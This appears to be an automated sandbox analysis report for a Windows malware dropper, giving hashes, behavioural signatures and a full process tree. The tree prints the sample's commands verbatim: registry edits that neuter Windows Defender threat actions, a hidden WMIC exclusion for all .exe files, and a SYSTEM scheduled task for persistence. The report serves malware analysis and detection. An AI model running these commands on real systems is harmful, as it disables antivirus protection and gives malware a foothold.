Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-07-2024 17:06

General

  • Target

    4ddcd379ab8dc22849c3c066cd9e74fddcc577e417f9773adcd915d3f9b21020.exe

  • Size

    7.3MB

  • MD5

    cc145a119e31cf1e329a85c292b8f880

  • SHA1

    6a39e5fb2221d05211b9954da1136271a136b57d

  • SHA256

    4ddcd379ab8dc22849c3c066cd9e74fddcc577e417f9773adcd915d3f9b21020

  • SHA512

    44538d34c988bd8c410f36d0fdb9073669f8cf99aa52af290dbbec3de35e4c923c47575a77b1d92a337a7e96a61f9de8214e934e40c4836aaaed61c4ece3f25a

  • SSDEEP

    196608:91OXwOHoI2vYLc9BquImiNvDmHNtc0m1c+f7KE+5S614MXEMFg9j:3OXwOHopqujiNvqN/O+RL14yE9j

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4ddcd379ab8dc22849c3c066cd9e74fddcc577e417f9773adcd915d3f9b21020.exe
    "C:\Users\Admin\AppData\Local\Temp\4ddcd379ab8dc22849c3c066cd9e74fddcc577e417f9773adcd915d3f9b21020.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Users\Admin\AppData\Local\Temp\7zSFF20.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Users\Admin\AppData\Local\Temp\7zS124.tmp\Install.exe
        .\Install.exe /NtRdidZjp "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3788
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3540
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1080
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4060
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1836
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:1620
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:340
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2688
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5012
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4660
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:924
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:3200
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:3248
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4200
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3312
                  • C:\Windows\SysWOW64\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    8⤵
                      PID:4864
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
              4⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:1856
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:452
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5048
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1384
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bcCGPajShxGMlZQUJS" /SC once /ST 17:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS124.tmp\Install.exe\" FU /VPdidmZq 385132 /S" /V1 /F
              4⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3448
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 832
              4⤵
              • Program crash
              PID:4700
      • C:\Users\Admin\AppData\Local\Temp\7zS124.tmp\Install.exe
        C:\Users\Admin\AppData\Local\Temp\7zS124.tmp\Install.exe FU /VPdidmZq 385132 /S
        1⤵
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        PID:3440
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          2⤵
            PID:2520
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:4488
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                4⤵
                  PID:3232
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    5⤵
                      PID:832
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:4940
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    4⤵
                      PID:392
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                          PID:2348
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:2900
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3156
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:3768
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:2960
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4644
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                            PID:4860
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                        • Indirect Command Execution
                        PID:4336
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3096
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3580
                            • C:\Windows\SysWOW64\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:1500
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                      2⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4328
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                        3⤵
                          PID:2244
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1348
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                          3⤵
                            PID:4276
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:440
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:4692
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:2948
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2280
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:1812
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3860
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:4784
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:1068
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:4060
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:4132
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:1584
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:4576
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1580
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1080
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:1968
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:924
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:4404
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3796
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3088
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:5112
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1544
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4444
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:4900
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
